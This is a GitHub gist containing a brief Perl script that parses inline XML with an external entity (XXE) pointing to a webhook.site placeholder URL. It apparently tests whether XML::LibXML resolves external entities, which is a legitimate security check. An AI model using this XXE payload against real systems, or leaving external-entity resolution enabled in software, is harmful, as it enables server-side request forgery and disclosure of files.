Created
December 30, 2024 12:04
-
-
Save j1n3l0/f7fc6e37fa32ce0d87571608749e0c38 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
use 5.020; | |
use XML::LibXML (); | |
XML::LibXML->load_xml( string => <<'EOF' ); | |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://webhook.site/<unique-token>">]> | |
<foo>&xxe;</foo> | |
EOF |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment